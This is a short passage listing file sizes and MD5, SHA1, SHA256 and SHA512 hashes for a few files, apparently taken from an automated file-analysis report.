SHA1b59334de367c2c34cffa154a9af78cc533d6db79
SHA256b846353aef9841e56d82c343cef8de2db9e9833c9269b21684d35a929903a823
SHA512fdf21ea086be1a8ae0f567a61d47c89fe19fcbd1c25bdc036256c7e74d04997bf5499bf8d81142dafd9359de4b7d2a7b9dcfbaf4d057566ff611116371735580
-
Filesize
3KB
MD50a0cea4b38b9a8adb16969e59127a6f8
SHA19294ec32beef0f755afeeb94ba52be33d3be4ecb
SHA2569038f3763578db7ebbc901b22b2ef5b9e730235979401b22424f7d9e7e8a91f6
SHA5125f2fe577b36b309f65899292013d0c5cfe9b3d3e9363ad4a72781b052b40ba8b0b56fc02e56a9baf885911c23e6a13412aed812f1674f2bba6384ba73fe0e432
-
Filesize
5.4MB
MD5ad2735f096925010a53450cb4178c89e
SHA1c6d65163c6315a642664f4eaec0fae9528549bfe
SHA2564e775b5fafb4e6d89a4694f8694d2b8b540534bd4a52ff42f70095f1c929160e
SHA5121868b22a7c5cba89545b06f010c09c5418b3d86039099d681eee9567c47208fdba3b89c6251cf03c964c58c805280d45ba9c3533125f6bd3e0bc067477e03ab9